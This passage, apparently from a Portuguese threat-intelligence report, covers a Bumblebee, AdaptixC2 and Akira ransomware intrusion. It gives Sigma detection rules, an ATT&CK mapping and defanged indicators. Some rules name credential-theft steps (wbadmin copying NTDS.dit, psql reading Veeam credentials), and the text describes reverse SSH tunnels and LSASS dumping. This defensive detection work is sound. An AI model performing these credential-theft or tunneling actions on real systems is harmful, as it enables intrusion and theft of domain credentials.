description: Detecta o Catalogo de Enderecos do Windows com outro nome, fora do lugar ou filho do WmiPrvSE
author: Lucas Rayan Guerra (CiberLab)
logsource:
category: process_creation
product: windows
detection:
selection:
OriginalFileName: 'WAB.EXE'
filter_legit:
Image|endswith: '\Windows Mail\wab.exe'
selection_wmi:
OriginalFileName: 'WAB.EXE'
ParentImage|endswith: '\WmiPrvSE.exe'
condition: (selection and not filter_legit) or selection_wmi
falsepositives:
- Desconhecidos
level: high
tags:
- attack.defense_evasion
- attack.t1036
- attack.t1055
Backups legítimos do controlador de domínio usam agendamento e destino conhecidos; um wbadmin com o NTDS.dit na lista de inclusão é roubo de credenciais até prova em contrário. O mesmo vale para o psql.exe lendo a tabela de credenciais do Veeam:
title: wbadmin Copiando o NTDS.dit
id: 67f11947-aeed-4da4-baa3-38bc6d29ac43
status: experimental
description: Detecta wbadmin start backup incluindo o banco NTDS.dit do Active Directory
author: Lucas Rayan Guerra (CiberLab)
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\wbadmin.exe'
CommandLine|contains|all:
- 'start backup'
- 'ntds.dit'
condition: selection
falsepositives:
- Backups manuais do AD feitos por administradores
level: high
tags:
- attack.credential_access
- attack.t1003.003
E para a leitura das credenciais do Veeam:
title: Leitura da Tabela de Credenciais do Veeam via psql
id: ce797567-c539-4326-a6c1-b7949e5a6560
status: experimental
description: Detecta psql.exe consultando a tabela credentials do banco VeeamBackup
author: Lucas Rayan Guerra (CiberLab)
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\psql.exe'
CommandLine|contains|all:
- 'VeeamBackup'
- 'credentials'
condition: selection
falsepositives:
- Manutencao do banco do Veeam pelo suporte do fabricante
level: high
tags:
- attack.credential_access
- attack.t1555
O túnel reverso usa o cliente SSH nativo do Windows com a opção -R, rara em servidores:
title: Tunel SSH Reverso Aberto pelo Cliente Nativo do Windows
id: 5c3d8f21-6a4e-4b9b-8e71-2f0d9a6c1b47
status: experimental
description: Detecta ssh.exe com encaminhamento reverso de porta (-R), usado para expor o RDP interno
author: Lucas Rayan Guerra (CiberLab)
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\ssh.exe'
CommandLine|contains: ' -R '
condition: selection
falsepositives:
- Administradores usando tuneis SSH legitimos a partir de servidores (raro)
level: high
tags:
- attack.command_and_control
- attack.t1572
E para a instalação do RustDesk como serviço:
title: Servico RustDesk Instalado em Servidor
id: 68d7d7b8-1358-4dcd-907d-6a35859a5201
status: experimental
description: Detecta a instalacao do RustDesk como servico do Windows
author: Lucas Rayan Guerra (CiberLab)
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ImagePath|contains: 'rustdesk'
condition: selection
falsepositives:
- Uso homologado do RustDesk pela equipe de suporte
level: high
tags:
- attack.persistence
- attack.t1543.003
- attack.command_and_control
- attack.t1219
Três famílias de eventos devem gerar alerta imediato, sem limiar: inclusão em grupos privilegiados (eventos 4728 e 4756, como backup_EA em Enterprise Admins), criação de contas de domínio (evento 4720) e reativação ou troca de senha de contas Administrator (eventos 4722 e 4724) [1]. As três ocorreram nos dois primeiros dias desta intrusão, antes de qualquer cifragem.
O relatório original lista as seguintes detecções que dispararam ou se aplicam ao caso [1]:
| Tipo | Regras |
|---|---|
| Emerging Threats | 2056726 e 2056727 (BumbleBee Loader CnC), 2043343 e 2044076 (domínios do RustDesk), 2027174, 2027182, 2027189 e 2027267 (movimento lateral por SMB, WMI e DCOM), 2025701 e 2025703 (executável criado por SMB), 2047702 e 2047703 (consulta ao ipify.org), 2851484 e 2851485 (ETPRO, DCERPC) [1] |
| Sigma (repositório público) | 30 regras, entre elas Process Memory Dump Via Comsvcs.DLL; Delete Volume Shadow Copies Via WMI With PowerShell; Suspicious WmiPrvSE Child Process; MSI Installation From Suspicious Locations; New User Created Via Net.EXE; Suspicious Manipulation Of Default Accounts Via Net.EXE; DNS Query To Remote Access Software Domain From Non-Browser App [1] |
| Sigma (conjunto privado) | Veeam Credential Dumping via PostgreSQL psql; DNS Zone Enumeration and Export via PowerShell; LSASS Enumeration Followed by Memory Dump; Multiple DGA DNS Queries [1] |
| YARA | 15 regras, entre elas AdaptixC2_listener_beacon_http, Windows_Trojan_Adaptix_b2cda978, Windows_Trojan_Bumblebee_35f50bea, CAPE_Bumblebee2024, win_bumblebee_auto, Windows_Ransomware_Akira_c8c298ba e SIGNATURE_BASE_MAL_WIN_Akira_Apr25 [1] |
AdgNsy.exe [1].backup_DA, backup_EA, qualquer conta criada ou reativada na janela do incidente e a conta Administrator do domínio, se não for usada [1].Trate como exposto o conteúdo dos compartilhamentos do servidor de arquivos e a SYSVOL [1]. A SYSVOL pode conter scripts de logon e preferências de política de grupo com senhas; revise-a. Avalie as obrigações de comunicação de incidente com dados pessoais, no Brasil à ANPD (Autoridade Nacional de Proteção de Dados) e aos titulares, conforme o art. 48 da Lei nº 13.709/2018 (LGPD).
comsvcs.dll [1].Técnicas do mapeamento publicado pelo The DFIR Report [1], acrescidas de técnicas descritas no texto do relatório. IDs e nomes conferidos na base oficial do MITRE ATT&CK para Enterprise [8]:
| Técnica | Nome | Relação com o caso |
|---|---|---|
| T1608.006 | Stage Capabilities: SEO Poisoning | Fachadas nos resultados do Bing [1] |
| T1189 | Drive-by Compromise | Download a partir do site sósia [1] |
| T1204.002 | User Execution: Malicious File | MSI executado manualmente pelo administrador [1] |
| T1553.002 | Subvert Trust Controls: Code Signing | MSIs assinados por empresas de fachada [1] |
| T1574.001 | Hijack Execution Flow: DLL | msimg32.dll carregada por consent.exe [1] |
| T1614.001 | System Location Discovery: System Language Discovery | Verificação das 27 localidades da CEI [1] |
| T1568.002 | Dynamic Resolution: Domain Generation Algorithms | Domínios .org de 14 caracteres [1] |
| T1071.001 | Application Layer Protocol: Web Protocols | Bumblebee e beacon HTTP do AdaptixC2 [1] |
| T1047 | Windows Management Instrumentation | Execução do AdgNsy.exe, consulta ao Veeam e exclusão das cópias de sombra [1] |
| T1055 | Process Injection | Shellcode do AdaptixC2 injetado no AdgNsy.exe [1] |
| T1036 | Masquerading | WAB.exe como AdgNsy.exe, SoftPerfect como n.exe, contas backup_* [1] |
| T1027.010 | Obfuscated Files or Information: Command Obfuscation | CmD.eXe e pOWerShELl.exE [1] |
| T1070.004 | Indicator Removal: File Deletion | Exclusão de loaders e registros [1] |
| T1685 | Disable or Modify Tools | BYOVD com utilitários "AV killer" no caso do Swisscom [1] |
| T1136 | Create Account | backup_DA e backup_EA [1] |
| T1098 | Account Manipulation | Inclusão em Enterprise Admins e troca de senhas de administrador [1] |
| T1219 | Remote Access Tools | RustDesk [1] |
| T1543.003 | Create or Modify System Process: Windows Service | RustDesk, cloudflared e drivers registrados como serviço [1] |
| T1082 | System Information Discovery | systeminfo [1] |
| T1033 | System Owner/User Discovery | whoami e quser [1] |
| T1482 | Domain Trust Discovery | nltest /domain_trusts [1] |
| T1018 | Remote System Discovery | nltest /dclist:, ping e Get-ADComputer [1] |
| T1087.001 | Account Discovery: Local Account | net user nos servidores [1] |
| T1087.002 | Account Discovery: Domain Account | Get-ADUser [1] |
| T1069.001 | Permission Groups Discovery: Local Groups | net localgroup administrators [1] |
| T1069.002 | Permission Groups Discovery: Domain Groups | net group "domain admins" /dom [1] |
| T1046 | Network Service Discovery | Varredura do beacon e do n.exe [1] |
| T1135 | Network Share Discovery | Invoke-ShareFinder [1] |
| T1083 | File and Directory Discovery | Varredura por credenciais e dados (evento 5145) [1] |
| T1003.003 | OS Credential Dumping: NTDS | NTDS.dit com wbadmin [1] |
| T1003.001 | OS Credential Dumping: LSASS Memory | MiniDump via comsvcs.dll com o lsassy [1] |
| T1555 | Credentials from Password Stores | Credenciais do Veeam [1] |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Veeam, SPNs, AD, DNS e cópias de sombra [1] |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Comandos de descoberta pelo beacon [1] |
| T1569.002 | System Services: Service Execution | Método SMB do lsassy [1] |
| T1021.001 | Remote Services: Remote Desktop Protocol | Principal vetor de movimento lateral [1] |
| T1021.003 | Remote Services: Distributed Component Object Model | Método DCOM (MMC20.Application) do lsassy [1] |
| T1572 | Protocol Tunneling | Túnel SSH reverso para o RDP; cloudflared [1] |
| T1090 | Proxy | Atividade do ator encaminhada pelo túnel [1] |
| T1039 | Data from Network Shared Drive | Arquivos dos compartilhamentos e a SYSVOL [1] |
| T1048.001 | Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol | SFTP pelo FileZilla [1] |
| T1041 | Exfiltration Over C2 Channel | Cerca de 2,5 GB pelo túnel SSH [1] |
| T1490 | Inhibit System Recovery | Exclusão das cópias de sombra [1] |
| T1486 | Data Encrypted for Impact | Akira nos domínios raiz e filho [1] |
Todos os indicadores vêm da fonte primária [1], transcritos da seção "Indicators" e do corpo do relatório. Domínios e endereços estão desarmados:
| Tipo | Indicador | Severidade | Contexto e ação |
|---|---|---|---|
| SHA-256 | 186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da | Crítica | ManageEngine-OpManager.msi (MD5 124a48b78060fa851e1cc077ca35713c, SHA-1 ab82bf27132323861810c0efcac6d5dd01600dd4). Procure em compartilhamentos e downloads [1]. |
| SHA-256 | a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 | Crítica | msimg32.dll, Bumblebee (MD5 ca8646dfc88423bb9fffda811160cebe, SHA-1 febbaf5f08a8e0782ffcce8beef1f2b4e249a52b) [1]. |
| SHA-256 | de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d | Crítica | locker.exe, Akira (MD5 8c113b3aa82c81eee7c6b4ed0ba9a90f, SHA-1 d66944e1a57daf04d3e809f22cd01946d593acaf) [1]. |
| Endereço IP | 109.205.195[.]211, 188.40.187[.]145, 171.22.183[.]43, 192.121.22[.]94, 194.127.178[.]21 | Alta | Comando e controle do Bumblebee. Bloqueie e cace conexões passadas [1]. |
| Endereço IP | 172.96.137[.]160 | Alta | Comando e controle do AdaptixC2 [1]. |
| Endereço IP | 193.242.184[.]150 | Alta | Destino do túnel SSH reverso e de cerca de 2,5 GB exfiltrados [1]. |
| Endereço IP | 185.174.100[.]203 | Crítica | Servidor de exfiltração SFTP na Ucrânia, usuário Stark [1]. |
| Endereço IP | 170.130.55[.]223, 83.229.17[.]60 | Alta | AdaptixC2 e túnel SSH no caso do Swisscom [1]. |
| Domínio | opmanager[.]pro, download-center[.]online | Alta | Fachada e gateway de entrega deste caso [1]. |
| Domínio | ip-scanner[.]org, zenmap[.]pro, soft-hub[.]pro, download-server[.]online, soft-server[.]online | Média | Fachadas e gateways das duas ondas e do caso do Swisscom [1]. |
| Domínio DGA | ev2sirbd269o5j[.]org, 2rxyt8yrhq0bgj[.]org, d1hmxkpwby0d4s[.]org, yj6jurm5qqkye5[.]org, ewujsfb1dp5ran[.]org, 8doj8uvx604eck[.]org, kwywztxoo2xdot[.]org | Alta | Bumblebee. Os dois primeiros resolveram para os IPs de comando e controle [1]. |
| Domínio DGA | ky1d1p1daahe5t[.]org, ovh1kn1tcqw5kp[.]org, 6cimu4mc085em8[.]org, 5ka8rxp6t6eup2[.]org, ks501oz9nm3v05[.]org, v5rjsdqogstopr[.]org | Alta | Bumblebee, domínios da configuração da amostra [1]. |
| Nome de arquivo | AdgNsy.exe, n.exe, locker.exe, win.exe | Alta | Beacon, scanner e ransomware. Os nomes mudam entre intrusões; prefira as regras da seção 13 [1]. |
| Arquivo | G7wO.sys, U8Vfsh.docx, AsaZQZDJz.avhdx | Alta | Dumps do LSASS em \Windows\Temp; os nomes são aleatórios, procure o padrão [1]. |
| Conta de domínio | backup_DA, backup_EA | Crítica | Contas criadas pelo ator; backup_EA em Enterprise Admins [1]. |
| Estação do ator | WORK, kali, DESKTOP-HPLM2TD, DESKTOP-KLKBBTS, SERVER | Média | Nomes de estação em logons do ator; os três últimos no caso do Swisscom [1]. |
| Driver e serviço | rwdrv.sys (mgdsrv), hlpdrv.sys (KMHLPSVC) | Alta | BYOVD no caso do Swisscom [1]. |
O corpo do relatório original cita o domínio DGA 2rxyt9urhq0bgj[.]org, e a lista de indicadores traz 2rxyt8yrhq0bgj[.]org. A tabela usa a grafia da lista de indicadores; ao caçar, procure as duas [1].
Bumblebee, AdaptixC2 e Akira, relatório técnico de análise de intrusão. Versão 2.0, emitida em 25 de setembro de 2026.
Lucas Rayan Guerra, CiberLab, uma iniciativa do Ciência Embarcada.
Classificado TLP:CLEAR: distribuição livre, sem restrição de compartilhamento.